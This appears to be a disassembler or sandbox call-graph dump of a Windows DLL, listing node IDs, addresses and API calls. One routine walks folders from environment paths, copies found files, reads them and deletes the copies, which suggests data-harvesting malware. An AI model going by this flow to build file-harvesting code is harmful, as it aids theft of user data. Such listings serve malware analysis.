7631->7632 7635 238dae5d 7632->7635 7633 238dae63 7649 238d8cc1 7633->7649 7635->7633 7637 238d8d52 26 API calls 7635->7637 7645 238dae95 7635->7645 7640 238dae8c 7637->7640 7638 238d8d52 26 API calls 7639 238daea1 CloseHandle 7638->7639 7639->7633 7641 238daead GetLastError 7639->7641 7644 238d8d52 26 API calls 7640->7644 7641->7633 7642 238d6332 __dosmaperr 20 API calls 7643 238daedd 7642->7643 7643->7627 7644->7645 7645->7633 7645->7638 7658 238d8c9e RtlLeaveCriticalSection 7646->7658 7648 238dada4 7648->7629 7650 238d8d37 7649->7650 7651 238d8cd0 7649->7651 7652 238d6368 __dosmaperr 20 API calls 7650->7652 7651->7650 7657 238d8cfa 7651->7657 7653 238d8d3c 7652->7653 7654 238d6355 __dosmaperr 20 API calls 7653->7654 7655 238d8d27 7654->7655 7655->7642 7655->7643 7656 238d8d21 SetStdHandle 7656->7655 7657->7655 7657->7656 7658->7648 7659->7414 7660->7394 6527 238d508a 6528 238d509c 6527->6528 6529 238d50a2 6527->6529 6531 238d5000 6528->6531 6535 238d502a 6531->6535 6536 238d500d 6531->6536 6532 238d5024 6533 238d571e _free 20 API calls 6532->6533 6533->6535 6534 238d571e _free 20 API calls 6534->6536 6535->6529 6536->6532 6536->6534 7661 238da945 7665 238da96d 7661->7665 7662 238da9a5 7663 238da99e 7674 238daa00 7663->7674 7664 238da997 7670 238daa17 7664->7670 7665->7662 7665->7663 7665->7664 7671 238daa20 7670->7671 7678 238db19b 7671->7678 7675 238daa20 7674->7675 7676 238db19b __startOneArgErrorHandling 21 API calls 7675->7676 7677 238da9a3 7676->7677 7679 238db1da __startOneArgErrorHandling 7678->7679 7684 238db25c __startOneArgErrorHandling 7679->7684 7688 238db59e 7679->7688 7681 238db286 7683 238db292 7681->7683 7695 238db8b2 7681->7695 7686 238d2ada _ValidateLocalCookies 5 API calls 7683->7686 7684->7681 7691 238d78a3 7684->7691 7687 238da99c 7686->7687 7702 238db5c1 7688->7702 7694 238d78cb 7691->7694 7692 238d2ada _ValidateLocalCookies 5 API calls 7693 238d78e8 7692->7693 7693->7681 7694->7692 7696 238db8bf 7695->7696 7697 238db8d4 7695->7697 7699 238d6368 __dosmaperr 20 API calls 7696->7699 7700 238db8d9 7696->7700 7698 238d6368 __dosmaperr 20 API calls 7697->7698 7698->7700 7701 238db8cc 7699->7701 7700->7683 7701->7683 7703 238db5ec __raise_exc 7702->7703 7704 238db7e5 RaiseException 7703->7704 7705 238db5bc 7704->7705 7705->7684 6663 238d7bc7 6664 238d7bd3 ___scrt_is_nonwritable_in_current_image 6663->6664 6665 238d7c0a _abort 6664->6665 6671 238d5671 RtlEnterCriticalSection 6664->6671 6667 238d7be7 6668 238d7f86 __fassign 20 API calls 6667->6668 6669 238d7bf7 6668->6669 6672 238d7c10 6669->6672 6671->6667 6675 238d56b9 RtlLeaveCriticalSection 6672->6675 6674 238d7c17 6674->6665 6675->6674 6676 238da1c6 IsProcessorFeaturePresent 6537 238d7a80 6538 238d7a8d 6537->6538 6539 238d637b __dosmaperr 20 API calls 6538->6539 6540 238d7aa7 6539->6540 6541 238d571e _free 20 API calls 6540->6541 6542 238d7ab3 6541->6542 6543 238d637b __dosmaperr 20 API calls 6542->6543 6547 238d7ad9 6542->6547 6545 238d7acd 6543->6545 6546 238d571e _free 20 API calls 6545->6546 6546->6547 6548 238d7ae5 6547->6548 6549 238d5eb7 6547->6549 6550 238d5c45 __dosmaperr 5 API calls 6549->6550 6551 238d5ede 6550->6551 6552 238d5efc InitializeCriticalSectionAndSpinCount 6551->6552 6553 238d5ee7 6551->6553 6552->6553 6554 238d2ada _ValidateLocalCookies 5 API calls 6553->6554 6555 238d5f13 6554->6555 6555->6547 7706 238d8640 7709 238d8657 7706->7709 7710 238d8679 7709->7710 7711 238d8665 7709->7711 7713 238d8681 7710->7713 7716 238d8693 7710->7716 7712 238d6368 __dosmaperr 20 API calls 7711->7712 7714 238d866a 7712->7714 7715 238d6368 __dosmaperr 20 API calls 7713->7715 7717 238d62ac _abort 26 API calls 7714->7717 7718 238d8686 7715->7718 7719 238d54a7 __fassign 38 API calls 7716->7719 7721 238d8652 7716->7721 7717->7721 7720 238d62ac _abort 26 API calls 7718->7720 7719->7721 7720->7721 7087 238d5303 7090 238d50a5 7087->7090 7099 238d502f 7090->7099 7093 238d502f 5 API calls 7094 238d50c3 7093->7094 7095 238d5000 20 API calls 7094->7095 7096 238d50ce 7095->7096 7097 238d5000 20 API calls 7096->7097 7098 238d50d9 7097->7098 7100 238d5048 7099->7100 7101 238d2ada _ValidateLocalCookies 5 API calls 7100->7101 7102 238d5069 7101->7102 7102->7093 7103 238d7103 GetCommandLineA GetCommandLineW 7722 238daf43 7723 238daf4d 7722->7723 7724 238daf59 7722->7724 7723->7724 7725 238daf52 CloseHandle 7723->7725 7725->7724 6677 238d4bdd 6678 238d4bec 6677->6678 6679 238d4c08 6677->6679 6678->6679 6681 238d4bf2 6678->6681 6680 238d6d60 51 API calls 6679->6680 6682 238d4c0f GetModuleFileNameA 6680->6682 6683 238d6368 __dosmaperr 20 API calls 6681->6683 6685 238d4c33 6682->6685 6684 238d4bf7 6683->6684 6686 238d62ac _abort 26 API calls 6684->6686 6700 238d4d01 6685->6700 6687 238d4c01 6686->6687 6692 238d4c66 6694 238d6368 __dosmaperr 20 API calls 6692->6694 6693 238d4c72 6695 238d4d01 38 API calls 6693->6695 6699 238d4c6b 6694->6699 6696 238d4c88 6695->6696 6698 238d571e _free 20 API calls 6696->6698 6696->6699 6697 238d571e _free 20 API calls 6697->6687 6698->6699 6699->6697 6702 238d4d26 6700->6702 6704 238d4d86 6702->6704 6712 238d70eb 6702->6712 6703 238d4c50 6706 238d4e76 6703->6706 6704->6703 6705 238d70eb 38 API calls 6704->6705 6705->6704 6707 238d4c5d 6706->6707 6708 238d4e8b 6706->6708 6707->6692 6707->6693 6708->6707 6709 238d637b __dosmaperr 20 API calls 6708->6709 6710 238d4eb9 6709->6710 6711 238d571e _free 20 API calls 6710->6711 6711->6707 6715 238d7092 6712->6715 6716 238d54a7 __fassign 38 API calls 6715->6716 6717 238d70a6 6716->6717 6717->6702 7104 238d281c 7107 238d2882 7104->7107 7110 238d3550 7107->7110 7109 238d282a 7111 238d355d 7110->7111 7114 238d358a 7110->7114 7112 238d47e5 ___std_exception_copy 21 API calls 7111->7112 7111->7114 7113 238d357a 7112->7113 7113->7114 7115 238d544d ___std_exception_copy 26 API calls 7113->7115 7114->7109 7115->7114 7116 238d2418 7117 238d2420 ___scrt_release_startup_lock 7116->7117 7120 238d47f5 7117->7120 7119 238d2448 7121 238d4808 7120->7121 7122 238d4804 7120->7122 7125 238d4815 7121->7125 7122->7119 7126 238d5b7a __dosmaperr 20 API calls 7125->7126 7129 238d482c 7126->7129 7127 238d2ada _ValidateLocalCookies 5 API calls 7128 238d4811 7127->7128 7128->7119 7129->7127 5784 238d1c5b 5785 238d1c6b ___scrt_fastfail 5784->5785 5788 238d12ee 5785->5788 5787 238d1c87 5789 238d1324 ___scrt_fastfail 5788->5789 5790 238d13b7 GetEnvironmentVariableW 5789->5790 5814 238d10f1 5790->5814 5793 238d10f1 57 API calls 5794 238d1465 5793->5794 5795 238d10f1 57 API calls 5794->5795 5796 238d1479 5795->5796 5797 238d10f1 57 API calls 5796->5797 5798 238d148d 5797->5798 5799 238d10f1 57 API calls 5798->5799 5800 238d14a1 5799->5800 5801 238d10f1 57 API calls 5800->5801 5802 238d14b5 lstrlenW 5801->5802 5803 238d14d9 lstrlenW 5802->5803 5813 238d14d2 5802->5813 5804 238d10f1 57 API calls 5803->5804 5805 238d1501 lstrlenW lstrcatW 5804->5805 5806 238d10f1 57 API calls 5805->5806 5807 238d1539 lstrlenW lstrcatW 5806->5807 5808 238d10f1 57 API calls 5807->5808 5809 238d156b lstrlenW lstrcatW 5808->5809 5810 238d10f1 57 API calls 5809->5810 5811 238d159d lstrlenW lstrcatW 5810->5811 5812 238d10f1 57 API calls 5811->5812 5812->5813 5813->5787 5815 238d1118 ___scrt_fastfail 5814->5815 5816 238d1129 lstrlenW 5815->5816 5827 238d2c40 5816->5827 5819 238d1168 lstrlenW 5820 238d1177 lstrlenW FindFirstFileW 5819->5820 5821 238d11e1 5820->5821 5822 238d11a0 5820->5822 5821->5793 5823 238d11aa 5822->5823 5824 238d11c7 FindNextFileW 5822->5824 5823->5824 5829 238d1000 5823->5829 5824->5822 5826 238d11da FindClose 5824->5826 5826->5821 5828 238d1148 lstrcatW lstrlenW 5827->5828 5828->5819 5828->5820 5830 238d1022 ___scrt_fastfail 5829->5830 5831 238d10af 5830->5831 5832 238d102f lstrcatW lstrlenW 5830->5832 5833 238d10b5 lstrlenW 5831->5833 5844 238d10ad 5831->5844 5834 238d106b lstrlenW 5832->5834 5835 238d105a lstrlenW 5832->5835 5860 238d1e16 5833->5860 5846 238d1e89 lstrlenW 5834->5846 5835->5834 5838 238d1088 GetFileAttributesW 5840 238d109c 5838->5840 5838->5844 5839 238d10ca 5841 238d1e89 5 API calls 5839->5841 5839->5844 5840->5844 5852 238d173a 5840->5852 5842 238d10df 5841->5842 5865 238d11ea 5842->5865 5844->5823 5847 238d2c40 ___scrt_fastfail 5846->5847 5848 238d1ea7 lstrcatW lstrlenW 5847->5848 5849 238d1ed1 lstrcatW 5848->5849 5850 238d1ec2 5848->5850 5849->5838 5850->5849 5851 238d1ec7 lstrlenW 5850->5851 5851->5849 5853 238d1747 ___scrt_fastfail 5852->5853 5880 238d1cca 5853->5880 5856 238d199f 5856->5844 5858 238d1824 ___scrt_fastfail _strlen 5858->5856 5900 238d15da 5858->5900 5861 238d1e29 5860->5861 5863 238d1e4c 5860->5863 5862 238d1e2d lstrlenW 5861->5862 5861->5863 5862->5863 5864 238d1e3f lstrlenW 5862->5864 5863->5839 5864->5863 5866 238d120e ___scrt_fastfail 5865->5866 5867 238d1e89 5 API calls 5866->5867 5868 238d1220 GetFileAttributesW 5867->5868 5869 238d1246 5868->5869 5870 238d1235 5868->5870 5871 238d1e89 5 API calls 5869->5871 5870->5869 5872 238d173a 35 API calls 5870->5872 5873 238d1258 5871->5873 5872->5869 5874 238d10f1 56 API calls 5873->5874 5875 238d126d 5874->5875 5876 238d1e89 5 API calls 5875->5876 5877 238d127f ___scrt_fastfail 5876->5877 5878 238d10f1 56 API calls 5877->5878 5879 238d12e6 5878->5879 5879->5844 5881 238d1cf1 ___scrt_fastfail 5880->5881 5882 238d1d0f CopyFileW CreateFileW 5881->5882 5883 238d1d55 GetFileSize 5882->5883 5884 238d1d44 DeleteFileW 5882->5884 5885 238d1ede 22 API calls 5883->5885 5889 238d1808 5884->5889 5886 238d1d66 ReadFile 5885->5886 5887 238d1d7d CloseHandle DeleteFileW 5886->5887 5888 238d1d94 CloseHandle DeleteFileW 5886->5888 5887->5889 5888->5889 5889->5856 5890 238d1ede 5889->5890 5892 238d222f 5890->5892 5893 238d224e 5892->5893 5896 238d2250 5892->5896 5908 238d474f 5892->5908 5913 238d47e5 5892->5913 5893->5858 5895 238d2908 5897 238d35d2 __CxxThrowException@8 RaiseException 5895->5897 5896->5895 5920 238d35d2 5896->5920 5899 238d2925 5897->5899 5899->5858 5901 238d160c _strcat _strlen 5900->5901 5902 238d163c lstrlenW 5901->5902 6008 238d1c9d 5902->6008 5904 238d1655 lstrcatW lstrlenW 5905 238d1678 5904->5905 5906 238d167e lstrcatW 5905->5906 5907 238d1693 ___scrt_fastfail 5905->5907 5906->5907 5907->5858 5923 238d4793 5908->5923 5911 238d478f 5911->5892 5912 238d4765 5929 238d2ada 5912->5929 5918 238d56d0 __dosmaperr 5913->5918 5914 238d570e 5942 238d6368 5914->5942 5915 238d56f9 RtlAllocateHeap 5917 238d570c 5915->5917 5915->5918 5917->5892 5918->5914 5918->5915 5919 238d474f __dosmaperr 7 API calls 5918->5919 5919->5918 5921 238d35f2 RaiseException 5920->5921 5921->5895 5924 238d479f ___scrt_is_nonwritable_in_current_image 5923->5924 5936 238d5671 RtlEnterCriticalSection 5924->5936 5926 238d47aa 5937 238d47dc 5926->5937 5928 238d47d1 _abort 5928->5912 5930 238d2ae5 IsProcessorFeaturePresent 5929->5930 5931 238d2ae3 5929->5931 5933 238d2b58 5930->5933 5931->5911 5941 238d2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5933->5941 5935 238d2c3b 5935->5911 5936->5926 5940 238d56b9 RtlLeaveCriticalSection 5937->5940 5939 238d47e3 5939->5928 5940->5939 5941->5935 5945 238d5b7a GetLastError 5942->5945 5946 238d5b99 5945->5946 5947 238d5b93 5945->5947 5951 238d5bf0 SetLastError 5946->5951 5971 238d637b 5946->5971 5964 238d5e08 5947->5964 5952 238d5bf9 5951->5952 5952->5917 5956 238d5bb3 5978 238d571e 5956->5978 5957 238d5bcf 5991 238d593c 5957->5991 5958 238d5bb9 5960 238d5be7 SetLastError 5958->5960 5960->5952 5962 238d571e _free 17 API calls 5963 238d5be0 5962->5963 5963->5951 5963->5960 5996 238d5c45 5964->5996 5966 238d5e2f 5967 238d5e3b 5966->5967 5968 238d5e47 TlsGetValue 5966->5968 5969 238d2ada _ValidateLocalCookies 5 API calls 5967->5969 5968->5967 5970 238d5e58 5969->5970 5970->5946 5974 238d6388 __dosmaperr 5971->5974 5972 238d63c8 5976 238d6368 __dosmaperr 19 API calls 5972->5976 5973 238d63b3 RtlAllocateHeap 5973->5974 5975 238d5bab 5973->5975 5974->5972 5974->5973 5977 238d474f __dosmaperr 7 API calls 5974->5977 5975->5956 5984 238d5e5e 5975->5984 5976->5975 5977->5974 5979 238d5729 HeapFree 5978->5979 5983 238d5752 __dosmaperr 5978->5983 5980 238d573e 5979->5980 5979->5983 5981 238d6368 __dosmaperr 18 API calls 5980->5981 5982 238d5744 GetLastError 5981->5982 5982->5983 5983->5958 5985 238d5c45 __dosmaperr 5 API calls 5984->5985 5986 238d5e85 5985->5986 5987 238d5ea0 TlsSetValue 5986->5987 5990 238d5e94 5986->5990 5987->5990 5988 238d2ada _ValidateLocalCookies 5 API calls 5989 238d5bc8 5988->5989 5989->5956 5989->5957 5990->5988 6002 238d5914 5991->6002 5999 238d5c71 5996->5999 6001 238d5c75 __crt_fast_encode_pointer 5996->6001 5997 238d5c95 6000 238d5ca1 GetProcAddress 5997->6000 5997->6001 5998 238d5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5998->5999 5999->5997 5999->5998 5999->6001 6000->6001 6001->5966 6003 238d5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6002->6003 6004 238d5938 6003->6004 6005 238d58c4 6004->6005 6006 238d5758 __dosmaperr 20 API calls 6005->6006 6007 238d58e8 6006->6007 6007->5962 6009 238d1ca6 _strlen 6008->6009 6009->5904 6718 238d20db 6719 238d20e7 ___scrt_is_nonwritable_in_current_image 6718->6719 6720 238d2110 dllmain_raw 6719->6720 6725 238d210b 6719->6725 6729 238d20f6 6719->6729 6721 238d212a 6720->6721 6720->6729 6731 238d1eec 6721->6731 6723 238d2177 6724 238d1eec 31 API calls 6723->6724 6723->6729 6726 238d218a 6724->6726 6725->6723 6728 238d1eec 31 API calls 6725->6728 6725->6729 6727 238d2193 dllmain_raw 6726->6727 6726->6729 6727->6729 6730 238d216d dllmain_raw 6728->6730 6730->6723 6732 238d1f2a dllmain_crt_process_detach 6731->6732 6733 238d1ef7 6731->6733 6736 238d1f06 6732->6736 6734 238d1f1c dllmain_crt_process_attach 6733->6734 6735 238d1efc 6733->6735 6734->6736 6737 238d1f01 6735->6737 6738 238d1f12 6735->6738 6736->6725 6737->6736 6741 238d240b 6737->6741 6746 238d23ec 6738->6746 6754 238d53e5 6741->6754 6865 238d3513 6746->6865 6749 238d23f5 6749->6736 6752 238d2408 6752->6736 6753 238d351e 7 API calls 6753->6749 6760 238d5aca 6754->6760 6757 238d351e 6836 238d3820 6757->6836 6759 238d2415 6759->6736 6761 238d2410 6760->6761 6762 238d5ad4 6760->6762 6761->6757 6763 238d5e08 __dosmaperr 11 API calls 6762->6763 6764 238d5adb 6763->6764 6764->6761 6765 238d5e5e __dosmaperr 11 API calls 6764->6765 6766 238d5aee 6765->6766 6768 238d59b5 6766->6768 6769 238d59c0 6768->6769 6770 238d59d0 6768->6770 6774 238d59d6 6769->6774 6770->6761 6773 238d571e _free 20 API calls 6773->6770 6775 238d59e9 6774->6775 6776 238d59ef 6774->6776 6777 238d571e _free 20 API calls 6775->6777 6778 238d571e _free 20 API calls 6776->6778 6777->6776 6779 238d59fb 6778->6779 6780 238d571e _free 20 API calls 6779->6780 6781 238d5a06 6780->6781 6782 238d571e _free 20 API calls 6781->6782 6783 238d5a11 6782->6783 6784 238d571e _free 20 API calls 6783->6784 6785 238d5a1c 6784->6785 6786 238d571e _free 20 API calls 6785->6786 6787 238d5a27 6786->6787 6788 238d571e _free 20 API calls 6787->6788 6789 238d5a32 6788->6789 6790 238d571e _free 20 API calls 6789->6790 6791 238d5a3d 6790->6791 6792 238d571e _free 20 API calls 6791->6792 6793 238d5a48 6792->6793 6794 238d571e _free 20 API calls 6793->6794 6795 238d5a56 6794->6795 6800 238d589c 6795->6800 6806 238d57a8 6800->6806 6802 238d58c0 6803 238d58ec 6802->6803 6819 238d5809 6803->6819 6805 238d5910 6805->6773 6807 238d57b4 ___scrt_is_nonwritable_in_current_image 6806->6807 6814 238d5671 RtlEnterCriticalSection 6807->6814 6810 238d57be 6812 238d571e _free 20 API calls 6810->6812 6813 238d57e8 6810->6813 6811 238d57f5 _abort 6811->6802 6812->6813 6815 238d57fd 6813->6815 6814->6810 6818 238d56b9 RtlLeaveCriticalSection 6815->6818 6817 238d5807 6817->6811 6818->6817 6820 238d5815 ___scrt_is_nonwritable_in_current_image 6819->6820 6827 238d5671 RtlEnterCriticalSection 6820->6827 6822 238d581f 6828 238d5a7f 6822->6828 6824 238d5832 6832 238d5848 6824->6832 6826 238d5840 _abort 6826->6805 6827->6822 6829 238d5a8e __fassign 6828->6829 6831 238d5ab5 __fassign 6828->6831 6830 238d7cc2 __fassign 20 API calls 6829->6830 6829->6831 6830->6831 6831->6824 6835 238d56b9 RtlLeaveCriticalSection 6832->6835 6834 238d5852 6834->6826 6835->6834 6837 238d382d 6836->6837 6841 238d384b ___vcrt_freefls@4 6836->6841 6838 238d383b 6837->6838 6842 238d3b67 6837->6842 6847 238d3ba2 6838->6847 6841->6759 6852 238d3a82 6842->6852 6844 238d3b81 6845 238d3b99 TlsGetValue 6844->6845 6846 238d3b8d 6844->6846 6845->6846 6846->6838 6848 238d3a82 try_get_function 5 API calls 6847->6848 6849 238d3bbc 6848->6849 6850 238d3bd7 TlsSetValue 6849->6850 6851 238d3bcb 6849->6851 6850->6851 6851->6841 6853 238d3aaa 6852->6853 6857 238d3aa6 __crt_fast_encode_pointer 6852->6857 6853->6857 6858 238d39be 6853->6858 6856 238d3ac4 GetProcAddress 6856->6857 6857->6844 6860 238d39cd try_get_first_available_module 6858->6860 6859 238d39ea LoadLibraryExW 6859->6860 6861 238d3a05 GetLastError 6859->6861 6860->6859 6862 238d3a60 FreeLibrary 6860->6862 6863 238d3a77 6860->6863 6864 238d3a38 LoadLibraryExW 6860->6864 6861->6860 6862->6860 6863->6856 6863->6857 6864->6860 6871 238d3856 6865->6871 6867 238d23f1 6867->6749 6868 238d53da 6867->6868 6869 238d5b7a __dosmaperr 20 API calls 6868->6869 6870 238d23fd 6869->6870 6870->6752 6870->6753 6872 238d385f 6871->6872 6873 238d3862 GetLastError 6871->6873 6872->6867 6874 238d3b67 ___vcrt_FlsGetValue 6 API calls 6873->6874 6875 238d3877 6874->6875 6876 238d38dc SetLastError 6875->6876 6877 238d3ba2 ___vcrt_FlsSetValue 6 API calls 6875->6877 6882 238d3896 6875->6882 6876->6867 6878 238d3890 6877->6878 6879 238d38b8 6878->6879 6880 238d3ba2 ___vcrt_FlsSetValue 6 API calls 6878->6880 6878->6882 6881 238d3ba2 ___vcrt_FlsSetValue 6 API calls 6879->6881 6879->6882 6880->6879 6881->6882 6882->6876 6556 238d4a9a 6559 238d5411 6556->6559 6560 238d541d _abort 6559->6560 6561 238d5af6 _abort 38 API calls 6560->6561 6564 238d5422 6561->6564 6562 238d55a8 _abort 38 API calls 6563 238d544c 6562->6563 6564->6562 6883 238d73d5 6884 238d73e1 ___scrt_is_nonwritable_in_current_image 6883->6884 6895 238d5671 RtlEnterCriticalSection 6884->6895 6886 238d73e8 6896 238d8be3 6886->6896 6888 238d73f7 6889 238d7406 6888->6889 6909 238d7269 GetStartupInfoW 6888->6909 6920 238d7422 6889->6920 6892 238d7417 _abort 6895->6886 6897 238d8bef ___scrt_is_nonwritable_in_current_image 6896->6897 6898 238d8bfc 6897->6898 6899 238d8c13 6897->6899 6900 238d6368 __dosmaperr 20 API calls 6898->6900 6923 238d5671 RtlEnterCriticalSection 6899->6923 6902 238d8c01 6900->6902 6903 238d62ac _abort 26 API calls 6902->6903 6904 238d8c0b _abort 6903->6904 6904->6888 6905 238d8c4b 6931 238d8c72 6905->6931 6907 238d8c1f 6907->6905 6924 238d8b34 6907->6924 6910 238d7318 6909->6910 6911 238d7286 6909->6911 6915 238d731f 6910->6915 6911->6910 6912 238d8be3 27 API calls 6911->6912 6913 238d72af 6912->6913 6913->6910 6914 238d72dd GetFileType 6913->6914 6914->6913 6916 238d7326 6915->6916 6917 238d7369 GetStdHandle 6916->6917 6918 238d73d1 6916->6918 6919 238d737c GetFileType 6916->6919 6917->6916 6918->6889 6919->6916 6935 238d56b9 RtlLeaveCriticalSection 6920->6935 6922 238d7429 6922->6892 6923->6907 6925 238d637b __dosmaperr 20 API calls 6924->6925 6926 238d8b46 6925->6926 6928 238d5eb7 11 API calls 6926->6928 6930 238d8b53 6926->6930 6927 238d571e _free 20 API calls 6929 238d8ba5 6927->6929 6928->6926 6929->6907 6930->6927 6934 238d56b9 RtlLeaveCriticalSection 6931->6934 6933 238d8c79 6933->6904 6934->6933 6935->6922 6936 238d4ed7 6937 238d6d60 51 API calls 6936->6937 6938 238d4ee9 6937->6938 6947 238d7153 GetEnvironmentStringsW 6938->6947 6941 238d4ef4 6943 238d571e _free 20 API calls 6941->6943 6944 238d4f29 6943->6944 6945 238d4eff 6946 238d571e _free 20 API calls 6945->6946 6946->6941 6948 238d71bd 6947->6948 6949 238d716a 6947->6949 6950 238d4eee 6948->6950 6951 238d71c6 FreeEnvironmentStringsW 6948->6951 6952 238d7170 WideCharToMultiByte 6949->6952 6950->6941 6959 238d4f2f 6950->6959 6951->6950 6952->6948 6953 238d718c 6952->6953 6954 238d56d0 21 API calls 6953->6954 6955 238d7192 6954->6955 6956 238d7199 WideCharToMultiByte 6955->6956 6957 238d71af 6955->6957 6956->6957 6958 238d571e _free 20 API calls 6957->6958 6958->6948 6960 238d4f44 6959->6960 6961 238d637b __dosmaperr 20 API calls 6960->6961 6971 238d4f6b 6961->6971 6962 238d4fcf 6963 238d571e _free 20 API calls 6962->6963 6964 238d4fe9 6963->6964 6964->6945 6965 238d637b __dosmaperr 20 API calls 6965->6971 6966 238d4fd1 6968 238d5000 20 API calls 6966->6968 6969 238d4fd7 6968->6969 6972 238d571e _free 20 API calls 6969->6972 6970 238d4ff3 6973 238d62bc _abort 11 API calls 6970->6973 6971->6962 6971->6965 6971->6966 6971->6970 6974 238d571e _free 20 API calls 6971->6974 6976 238d544d 6971->6976 6972->6962 6975 238d4fff 6973->6975 6974->6971 6977 238d5468 6976->6977 6978 238d545a 6976->6978 6979 238d6368 __dosmaperr 20 API calls 6977->6979 6978->6977 6980 238d547f 6978->6980 6984 238d5470 6979->6984 6982 238d547a 6980->6982 6983 238d6368 __dosmaperr 20 API calls 6980->6983 6981 238d62ac _abort 26 API calls 6981->6982 6982->6971 6983->6984 6984->6981 7726 238d5351 7727 238d5374 7726->7727 7728 238d5360 7726->7728 7729 238d571e _free 20 API calls 7727->7729 7728->7727 7730 238d571e _free 20 API calls 7728->7730 7731 238d5386 7729->7731 7730->7727 7732 238d571e _free 20 API calls 7731->7732 7733 238d5399 7732->7733 7734 238d571e _free 20 API calls 7733->7734 7735 238d53aa 7734->7735 7736 238d571e _free 20 API calls 7735->7736 7737 238d53bb 7736->7737 6565 238d3c90 RtlUnwind 6985 238d36d0 6986 238d36e2 6985->6986 6988 238d36f0 @_EH4_CallFilterFunc@8 6985->6988 6987 238d2ada _ValidateLocalCookies 5 API calls 6986->6987 6987->6988 6566 238d60ac 6567 238d60dd 6566->6567 6568 238d60b7 6566->6568 6568->6567 6569 238d60c7 FreeLibrary 6568->6569 6569->6568 7738 238d506f 7739 238d5087 7738->7739 7740 238d5081 7738->7740 7741 238d5000 20 API calls 7740->7741 7741->7739 7130 238d742b 7131 238d7430 7130->7131 7133 238d7453 7131->7133 7134 238d8bae 7131->7134 7135 238d8bbb 7134->7135 7136 238d8bdd 7134->7136 7137 238d8bc9 RtlDeleteCriticalSection 7135->7137 7138 238d8bd7 7135->7138 7136->7131 7137->7137 7137->7138 7139 238d571e _free 20 API calls 7138->7139 7139->7136 7742 238dac6b 7743 238dac84 __startOneArgErrorHandling 7742->7743 7745 238dacad __startOneArgErrorHandling 7743->7745 7746 238db2f0 7743->7746 7747 238db329 __startOneArgErrorHandling 7746->7747 7748 238db5c1 __raise_exc RaiseException 7747->7748 7749 238db350 __startOneArgErrorHandling 7747->7749 7748->7749 7750 238db393 7749->7750 7751 238db36e 7749->7751 7752 238db8b2 __startOneArgErrorHandling 20 API calls 7750->7752 7757 238db8e1 7751->7757 7754 238db38e __startOneArgErrorHandling 7752->7754 7755 238d2ada _ValidateLocalCookies 5 API calls 7754->7755 7756 238db3b7 7755->7756 7756->7745 7758 238db8f0 7757->7758 7759 238db90f __startOneArgErrorHandling 7758->7759 7760 238db964 __startOneArgErrorHandling 7758->7760 7761 238d78a3 __startOneArgErrorHandling 5 API calls 7759->7761 7762 238db8b2 __startOneArgErrorHandling 20 API calls 7760->7762 7763 238db950 7761->7763 7765 238db95d 7762->7765 7764 238db8b2 __startOneArgErrorHandling 20 API calls 7763->7764 7763->7765 7764->7765 7765->7754 6570 238dc7a7 6571 238dc7be 6570->6571 6577 238dc80d 6570->6577 6571->6577 6579 238dc7e6 GetModuleHandleA 6571->6579 6572 238dc835 GetModuleHandleA 6572->6577 6573 238dc872 6576 238dc85f GetProcAddress 6576->6577 6577->6572 6577->6573 6577->6576 6580 238dc7ef 6579->6580 6586 238dc80d 6579->6586 6588 238dc803 GetProcAddress 6580->6588 6582 238dc835 GetModuleHandleA 6582->6586 6583 238dc872 6586->6582 6586->6583 6587 238dc85f GetProcAddress 6586->6587 6587->6586 6592 238dc80d 6588->6592 6589 238dc835 GetModuleHandleA 6589->6592 6590 238dc872 6591 238dc85f GetProcAddress 6591->6592 6592->6589 6592->6590 6592->6591 6593 238d21a1 ___scrt_dllmain_exception_filter 7766 238d9d61 7767 238d9d81 7766->7767 7770 238d9db8 7767->7770 7769 238d9dab 7771 238d9dbf 7770->7771 7772 238d9e20 7771->7772 7776 238d9ddf 7771->7776 7773 238daa17 21 API calls 7772->7773 7774 238da90e 7772->7774 7775 238d9e6e 7773->7775 7774->7769 7775->7769 7776->7774 7777 238daa17 21 API calls 7776->7777 7778 238da93e 7777->7778 7778->7769 6594 238d81a0 6595 238d81d9 6594->6595 6596 238d81dd 6595->6596 6607 238d8205 6595->6607 6597 238d6368 __dosmaperr 20 API calls 6596->6597 6599 238d81e2 6597->6599 6598 238d8529 6600 238d2ada _ValidateLocalCookies 5 API calls 6598->6600 6601 238d62ac _abort 26 API calls 6599->6601 6603 238d8536 6600->6603 6602 238d81ed 6601->6602 6604 238d2ada _ValidateLocalCookies 5 API calls 6602->6604 6605 238d81f9 6604->6605 6607->6598 6608 238d80c0 6607->6608 6611 238d80db 6608->6611 6609 238d2ada _ValidateLocalCookies 5 API calls 6610 238d8152 6609->6610 6610->6607 6611->6609 6989 238da1e0 6992 238da1fe 6989->6992 6991 238da1f6 6993 238da203 6992->6993 6995 238da298 6993->6995 6997 238daa53 6993->6997 6995->6991 6998 238daa80 6997->6998 6999 238daa70 RtlDecodePointer 6997->6999 7000 238dab02 6998->7000 7001 238dab0d 6998->7001 7005 238daab7 6998->7005 6999->6998 7002 238d2ada _ValidateLocalCookies 5 API calls 7000->7002 7001->7000 7004 238d6368 __dosmaperr 20 API calls 7001->7004 7003 238da42f 7002->7003 7003->6991 7004->7000 7005->7000 7006 238d6368 __dosmaperr 20 API calls 7005->7006 7006->7000 7779 238d7260 GetStartupInfoW 7780 238d7318 7779->7780 7781 238d7286 7779->7781 7781->7780 7782 238d8be3 27 API calls 7781->7782 7783 238d72af 7782->7783 7783->7780 7784 238d72dd GetFileType 7783->7784 7784->7783 7140 238d543d 7141 238d5440 7140->7141 7142 238d55a8 _abort 38 API calls 7141->7142 7143 238d544c 7142->7143 6612 238d67bf 6617 238d67f4 6612->6617 6615 238d67db 6616 238d571e _free 20 API calls 6616->6615 6618 238d6806 6617->6618 6627 238d67cd 6617->6627 6619 238d680b 6618->6619 6620 238d6836 6618->6620 6621 238d637b __dosmaperr 20 API calls 6619->6621 6620->6627 6628 238d71d6 6620->6628 6622 238d6814 6621->6622 6624 238d571e _free 20 API calls 6622->6624 6624->6627 6625 238d6851 6626 238d571e _free 20 API calls 6625->6626 6626->6627 6627->6615 6627->6616 6629 238d71e1 6628->6629 6630 238d7209 6629->6630 6632 238d71fa 6629->6632 6631 238d7218 6630->6631 6637 238d8a98 6630->6637 6644 238d8acb 6631->6644 6634 238d6368 __dosmaperr 20 API calls 6632->6634 6636 238d71ff ___scrt_fastfail 6634->6636 6636->6625 6638 238d8ab8 